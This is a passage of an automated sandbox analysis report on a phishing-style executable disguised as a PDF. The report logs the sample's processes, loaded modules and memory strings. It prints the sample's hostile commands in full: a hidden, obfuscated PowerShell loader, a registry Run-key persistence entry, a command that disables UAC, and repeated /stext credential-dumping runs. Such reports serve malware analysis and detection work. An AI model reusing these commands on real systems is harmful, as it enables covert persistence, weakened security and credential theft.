            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_00430F5418_2_00430F54
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_004050C219_2_004050C2
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_004014AB19_2_004014AB
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_0040513319_2_00405133
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_004051A419_2_004051A4
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_0040124619_2_00401246
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_0040CA4619_2_0040CA46
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_0040523519_2_00405235
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_004032C819_2_004032C8
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_004222D919_2_004222D9
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_0040168919_2_00401689
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_00402F6019_2_00402F60
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_004050C222_2_004050C2
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_004014AB22_2_004014AB
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_0040513322_2_00405133
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_004051A422_2_004051A4
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_0040124622_2_00401246
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_0040CA4622_2_0040CA46
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_0040523522_2_00405235
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_004032C822_2_004032C8
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_004222D922_2_004222D9
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_0040168922_2_00401689
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_00402F6022_2_00402F60
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\BgImage.dll DBF91707FA157603BEA025A6411CDCB497AB11262C9C18B14DC431A45AA17C0B
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\UserInfo.dll 943B33829F9013E4D361482A5C8981BA20A7155C78691DBE02A8F8CD2A02EFA0
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 00413DCE appears 48 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 00414060 appears 50 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 00413CE8 appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 00413D0C appears 36 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 00413D18 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 00413025 appears 78 times
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: String function: 00416760 appears 69 times
            Source: RFQ24060084#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@29/27@4/5
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,17_2_004182CE
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_00403348
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,19_2_00410DE1
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,22_2_00410DE1
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,17_2_00413D4C
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,17_2_0040B58D
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\kilnsJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4D
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsjD213.tmpJump to behavior
            Source: RFQ24060084#U00b7pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000012.00000002.2157879350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000015.00000002.2218752496.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Fatherhoods.exe, 00000007.00000002.2601725533.0000000022840000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: Fatherhoods.exe, 00000011.00000002.2234766300.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000011.00000003.2229531439.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257766759.0000000002236000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000003.2256403629.0000000002235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: RFQ24060084#U00b7pdf.exeReversingLabs: Detection: 40%
            Source: RFQ24060084#U00b7pdf.exeVirustotal: Detection: 54%
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeFile read: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_18-33173
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe "C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe"
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe "C:\Users\user\AppData\Local\Temp\Fatherhoods.exe"
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz"
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\ieqxsfhtkjvzqdndurmsqf"
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\tydqtxsuyrnmajbpdcyttscnyt"
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo"
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\akkkrhibwebpzeqcfkuhx"
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\lepdszsvkmtcbkegougjiype"
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe "C:\Users\user\AppData\Local\Temp\Fatherhoods.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\ieqxsfhtkjvzqdndurmsqf"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\tydqtxsuyrnmajbpdcyttscnyt"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\akkkrhibwebpzeqcfkuhx"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\lepdszsvkmtcbkegougjiype"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: edputil.dllJump to behavior
